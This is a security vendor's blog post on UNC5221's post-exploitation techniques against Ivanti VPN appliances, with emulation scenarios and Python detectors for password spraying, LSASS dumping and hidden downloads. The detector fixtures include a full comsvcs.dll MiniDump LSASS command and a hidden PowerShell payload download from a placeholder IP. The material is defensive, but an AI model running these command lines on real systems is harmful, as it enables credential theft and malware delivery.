On January 10, 2024, the software company Ivanti disclosed two vulnerabilities impacting Ivanti Connect Secure VPN, formerly Pulse Secure, and Ivanti Policy Secure appliances. Successful exploitation of these vulnerabilities could result in authentication bypass and command injection, leading to further downstream compromise of a victim network.
A day later, on January 11, researchers began to detect evidence of widespread scanning by an entity with knowledge of these vulnerabilities. Logs present on Ivanti Connect Secure (CS) VPN devices showed requests for several file paths that are not publicly known.
On the same day, Ivanti customers began reporting the discovery of mismatched files present on their appliances. In turn, these organizations shared the results of the built-in integrity scan which showed no signs of previous mismatched files.
Several researchers engaged in investigating the exploitation of these zero-day vulnerabilities in the wild by an adversary nicknamed UNC5221, also known as UTA0178. This adversary leveraged multiple custom malware families, in several cases trojanizing legitimate files within the device with malicious code.
AttackIQ has released a new assessment template that emulates the different Tactics, Techniques, and Procedures (TTPs) exhibited by the UNC5221 adversary following the successful exploitation of two zero-day vulnerabilities with the aim of helping customers validate their security controls and their ability to defend against this recent threat.
Validating your security program performance against these behaviors is vital in reducing risk. By using this new assessment template in the AttackIQ Security Optimization Platform, security teams will be able to:
- Assess their security posture against a newly discovered threat that, rather than carrying out opportunistic attacks, aimed to maintain its presence in a subset of high-priority targets it had compromised after the inevitable release of a patch.
- Continuously validate detection and prevention pipelines against widely known behaviors linked to the exploitation of these vulnerabilities.
UNC5221 – 2024-01 – Ivanti Vulnerability Post-Compromise TTPs
This assessment template emulates the different Tactics, Techniques, and Procedures (TTPs) exhibited by UNC5221 after successful exploitation of CVE-2023-46805 (authentication bypass) and CVE-2024-21887 (command injection).
The template is divided into Tactics, and these group the Techniques and Implementations exhibited by UNC5221 during its activities.
1. Discovery: Techniques that adversaries use to discover information related to the compromised environment.
Network Service Discovery (T1046): This scenario uses nmap to scan for hosts with open ports for Samba File Sharing (SMB), Remote Desktop (RDP), or Active Directory (LDAP), identifying hosts that would be remotely accessible to the attacker.
2. Collection: Techniques used by adversaries to collect the discovered information regarding the compromised system.
Archive Collected Data: Archive via Utility (T1560.001): This scenario compresses all the specified input files with the given compression level to a .7z archive by executing the 7zip binary file.
3. Credential Access: Techniques used by adversaries to harvest credentials available on the compromised system.
OS Credential Dumping: LSASS Memory (T1003.001): Uses comsvcs.dll to call the MiniDump export that will dump the LSASS process memory to disk. This process contains a variety of credential materials and can be passed to additional dumping tools to extract credentials.
4. Lateral Movement: Consists of the techniques adversaries use to enter and control remote systems on a network. Following through on their primary objective often requires exploring the network to find their target and subsequently gaining access to it.
Remote Services: Remote Desktop Protocol (T1021.001): Remote Desktop is the built-in remote access utility used by Windows. This scenario attempts to remotely connect to another accessible asset with stolen credentials.
Remote Services: SSH (T1021.004): This scenario will initiate an SSH connection to an external AttackIQ-hosted server to exercise restrictions in outbound traffic.
5. Command and Control: Techniques that adversaries may use to communicate with systems under their control within a victim network.
Ingress Tool Transfer (T1105): This scenario downloads known malicious samples to memory and saves them to disk in independent scenarios, testing the ability of network and endpoint controls to prevent their delivery.
Internet Connection Discovery (T1016.001): This scenario validates whether the system is capable of accessing the internet by using the native curl utility to make a request to a legitimate third-party site that reports the external IP address used to access the domain.
Opportunities to Expand Emulation Capabilities
In addition to the released assessment template, AttackIQ recommends the following scenarios to extend the emulation of the capabilities exhibited by UNC5221. These scenarios can be selected within the scenario library and executed in the corresponding environments.
- Dump Active Directory Database using ntdsutil.exe (003): This scenario will attempt to execute the ntdsutil.exe utility to dump the NTDS.dit file along with the SYSTEM and SECURITY registry hives. This scenario must be run on a Domain Controller (DC).
- PCAP Replay – SMB Password Spraying: This scenario will simulate an SMB password spraying attack against an SMB server on port 445/TCP. A password spraying attack is a type of brute force attack where a malicious adversary attempts to brute force logins based on a list of usernames with a default or predictable password.
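As an added example (not AttackIQ's scenario code), the following Python sketches the defender's side of the SMB password-spraying scenario above. It works over constructed failed-logon records with an assumed (timestamp, source, account) layout and flags a source that tries many distinct accounts inside one window, while a single account hammered many times (plain brute force) is caught by a separate companion check, so the two shapes of the attack are told apart.

```python
from collections import defaultdict
from datetime import datetime, timedelta
from typing import Dict, List, Tuple

# Constructed failed-logon records as (ISO timestamp, source IP, target account).
# The layout is an assumption for this example; in practice the tuples would be
# built from Windows Security event 4625 or a file server's SMB audit log.
FAILED_LOGONS: List[Tuple[str, str, str]] = [
    # 10.0.0.25 walks a list of accounts, one attempt each, within seconds: a spray.
    ("2024-01-12T09:00:01", "10.0.0.25", "alice"),
    ("2024-01-12T09:00:02", "10.0.0.25", "bob"),
    ("2024-01-12T09:00:03", "10.0.0.25", "carol"),
    ("2024-01-12T09:00:04", "10.0.0.25", "dave"),
    ("2024-01-12T09:00:05", "10.0.0.25", "erin"),
    ("2024-01-12T09:00:06", "10.0.0.25", "frank"),
    ("2024-01-12T09:00:07", "10.0.0.25", "grace"),
    ("2024-01-12T09:00:08", "10.0.0.25", "heidi"),
    # Same source hours later: a lone failure outside the spray window.
    ("2024-01-12T11:30:00", "10.0.0.25", "ivan"),
    # 10.0.0.40 mistypes one password a few times: ordinary user error.
    ("2024-01-12T09:03:10", "10.0.0.40", "carol"),
    ("2024-01-12T09:03:20", "10.0.0.40", "carol"),
    ("2024-01-12T09:03:31", "10.0.0.40", "carol"),
    # 10.0.0.77 hammers one account: classic brute force, not a spray.
    *[("2024-01-12T09:05:%02d" % s, "10.0.0.77", "admin") for s in range(0, 60, 10)],
]


def detect_password_spray(events, window: timedelta = timedelta(minutes=10),
                          min_users: int = 5) -> Dict[str, Tuple[str, List[str]]]:
    """Return {source: (window start, sorted accounts)} for every source that
    attempted at least min_users distinct accounts inside one sliding window.
    Each account counts once, so one account tried many times never reaches
    the threshold here; that shape is handled by the companion check below."""
    by_source: Dict[str, List[Tuple[datetime, str]]] = defaultdict(list)
    for ts, source, user in events:
        by_source[source].append((datetime.fromisoformat(ts), user))

    alerts: Dict[str, Tuple[str, List[str]]] = {}
    for source, attempts in by_source.items():
        attempts.sort()
        lo = 0
        for hi in range(len(attempts)):
            # Shrink the window from the left until it spans at most `window`.
            while attempts[hi][0] - attempts[lo][0] > window:
                lo += 1
            users = {user for _, user in attempts[lo:hi + 1]}
            if len(users) >= min_users:
                # Keep the window with the widest account coverage for this source.
                best = alerts.get(source)
                if best is None or len(users) > len(best[1]):
                    alerts[source] = (attempts[lo][0].isoformat(), sorted(users))
    return alerts


def detect_single_account_brute_force(events, window: timedelta = timedelta(minutes=10),
                                      min_attempts: int = 5) -> Dict[Tuple[str, str], int]:
    """Companion check for the other brute-force shape: one source failing against
    one account min_attempts times inside a window. Returns {(source, account): count}."""
    by_pair: Dict[Tuple[str, str], List[datetime]] = defaultdict(list)
    for ts, source, user in events:
        by_pair[(source, user)].append(datetime.fromisoformat(ts))
    alerts: Dict[Tuple[str, str], int] = {}
    for pair, times in by_pair.items():
        times.sort()
        lo = 0
        for hi in range(len(times)):
            while times[hi] - times[lo] > window:
                lo += 1
            count = hi - lo + 1
            if count >= min_attempts and count > alerts.get(pair, 0):
                alerts[pair] = count
    return alerts


if __name__ == "__main__":
    for source, (start, users) in detect_password_spray(FAILED_LOGONS).items():
        print(f"spray from {source} starting {start}: {len(users)} accounts {users}")
    for (source, user), count in detect_single_account_brute_force(FAILED_LOGONS).items():
        print(f"brute force from {source} against {user}: {count} failures")
```

The thresholds (10 minutes, 5 accounts, 5 attempts) are starting points to tune against your own baseline; a slow spray that spaces attempts over hours needs a longer window, and a large domain with many helpdesk resets may need a higher account count to keep the rule quiet.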
Detection and Mitigation Opportunities
Given the number of different techniques being utilized by this threat, it can be difficult to know which to prioritize for prevention and detection opportunities. AttackIQ recommends first focusing on the following techniques emulated in our scenarios before moving on to the remaining techniques.
1. Review Ivanti’s Patching and Detection Recommendations:
Ivanti has provided a number of recommendations for defending against exploitation of these widely known vulnerabilities. AttackIQ strongly recommends reviewing the detection and mitigation recommendations first, adapting them to your environment to determine whether you have already been impacted, before reviewing the assessment results.
2. OS Credential Dumping: LSASS Memory (T1003.001):
Adversaries may attempt to extract user and credential information from the Local Security Authority Subsystem Service (LSASS) process.
Search for executions of comsvcs that attempt to access the LSASS process.
Process Name == (comsvcs)
Command Line CONTAINS (‘lsass’)
MITRE ATT&CK lists the following mitigations:
- M1028 – Operating System Configuration
- M1027 – Password Policies
- M1026 – Privileged Account Management
- M1017 – User Training
- M1040 – Behavior Prevention on Endpoint
- M1043 – Credential Access Protection
- M1025 – Privileged Process Integrity
3. Ingress Tool Transfer (T1105):
This actor relies heavily on downloading additional stages of malware. Endpoint and network security controls should both be employed to detect the delivery of these malicious payloads.
The following signatures can help identify when native utilities are being used to download malicious payloads.
Process Name == (Cmd.exe OR Powershell.exe)
Command Line CONTAINS (("IWR" OR "Invoke-WebRequest") AND "DownloadData" AND "Hidden")
MITRE ATT&CK has the following mitigation recommendations.
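The two detection signatures printed above (item 2, comsvcs.dll against LSASS, and item 3, a hidden download through cmd.exe or powershell.exe) are written as pseudo-queries. As an added example, not AttackIQ's code, the Python below turns both into functions and runs them over constructed process-creation events so the rules' hits and misses can be seen. The event layout, host names, PID, paths and the 203.0.113.0/24 addresses are all assumptions made for the example. One departure from the literal text is deliberate: comsvcs.dll is loaded through rundll32.exe rather than running as its own image, so the first rule accepts "comsvcs" in either the image name or the command line instead of requiring an exact process-name match.

```python
import re
from dataclasses import dataclass
from typing import Callable, List, Tuple


@dataclass(frozen=True)
class ProcessEvent:
    """One process-creation record. The three-field layout is an assumption
    made for this example; real telemetry (Sysmon event 1, EDR process
    events) carries the same fields under different names."""
    host: str
    process_name: str
    command_line: str


def _has(text: str, *needles: str) -> bool:
    """Case-insensitive substring test: True only if every needle is present."""
    low = text.lower()
    return all(n.lower() in low for n in needles)


LSASS_RULE = "T1003.001 LSASS MiniDump via comsvcs.dll"
INGRESS_RULE = "T1105 Hidden download via cmd.exe/powershell.exe"


def lsass_minidump_via_comsvcs(ev: ProcessEvent) -> bool:
    """Rule from the write-up: Process Name == (comsvcs) AND Command Line CONTAINS ('lsass').
    comsvcs.dll is loaded through rundll32.exe rather than running as its own image,
    so 'comsvcs' is accepted in either the image name or the command line."""
    return (_has(ev.process_name, "comsvcs") or _has(ev.command_line, "comsvcs")) \
        and _has(ev.command_line, "lsass")


def native_download_via_shell(ev: ProcessEvent) -> bool:
    """Rule from the write-up: Process Name == (Cmd.exe OR Powershell.exe) AND
    Command Line CONTAINS ((IWR OR Invoke-WebRequest) AND DownloadData AND Hidden).
    IWR is matched as a whole word so it does not fire on unrelated text."""
    image = ev.process_name.lower().rsplit("\\", 1)[-1]
    if image not in ("cmd.exe", "powershell.exe"):
        return False
    cl = ev.command_line
    fetch = bool(re.search(r"\biwr\b", cl, re.IGNORECASE)) or _has(cl, "invoke-webrequest")
    return fetch and _has(cl, "downloaddata", "hidden")


RULES: List[Tuple[str, Callable[[ProcessEvent], bool]]] = [
    (LSASS_RULE, lsass_minidump_via_comsvcs),
    (INGRESS_RULE, native_download_via_shell),
]


def evaluate(events: List[ProcessEvent]) -> List[Tuple[str, str]]:
    """Run every rule over every event; return (host, rule name) for each match."""
    return [(ev.host, name) for ev in events for name, rule in RULES if rule(ev)]


# Constructed sample events (hosts, PID, paths and the 203.0.113.0/24 addresses are made up).
SAMPLE_EVENTS = [
    # Should fire LSASS_RULE: comsvcs.dll on the command line and 'lsass' in the output path.
    ProcessEvent("ws01", "rundll32.exe",
                 r"rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump 712 C:\Users\Public\lsass.dmp full"),
    # Should fire INGRESS_RULE: hidden window, IWR and a DownloadData call in one command line.
    ProcessEvent("ws02", "powershell.exe",
                 r"-WindowStyle Hidden -Command (New-Object Net.WebClient).DownloadData('http://203.0.113.10/s2.bin'); IWR http://203.0.113.10/s3.bin -OutFile C:\Users\Public\s3.bin"),
    # Benign download: no Hidden, no DownloadData, so the rule as written stays quiet.
    ProcessEvent("ws03", "powershell.exe",
                 "-Command Invoke-WebRequest https://intranet.example/update.json -OutFile update.json"),
    # Same MiniDump technique with only the PID and a neutral file name: the literal
    # 'lsass' clause is not satisfied, so this one is MISSED by the rule as printed.
    ProcessEvent("ws04", "rundll32.exe",
                 r"rundll32.exe comsvcs.dll, MiniDump 712 C:\Temp\out.dmp full"),
    ProcessEvent("dc01", "cmd.exe", "/c whoami /all"),
]


if __name__ == "__main__":
    for host, rule in evaluate(SAMPLE_EVENTS):
        print(f"{host}: {rule}")
```

The ws04 event is the caveat worth taking away: the MiniDump export takes a process ID, not a name, so a dump whose output file is not called lsass never contains the string the rule looks for. A hunt on this technique should therefore also alert on comsvcs.dll together with MiniDump regardless of the target, and, where the sensor exposes it, on the LSASS process handle access itself rather than on command-line text alone.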
In summary, this assessment template will evaluate security and incident response processes and support the improvement of your security control posture against the activities associated with this threat. With data generated from continuous testing and use of this assessment template, you can focus your teams on achieving key security outcomes, adjust your security controls, and work to elevate your total security program effectiveness.
AttackIQ stands at the ready to help security teams implement this assessment template and other aspects of the AttackIQ Security Optimization Platform, including through our fully managed service, AttackIQ Ready!, and our co-managed security service, AttackIQ Enterprise.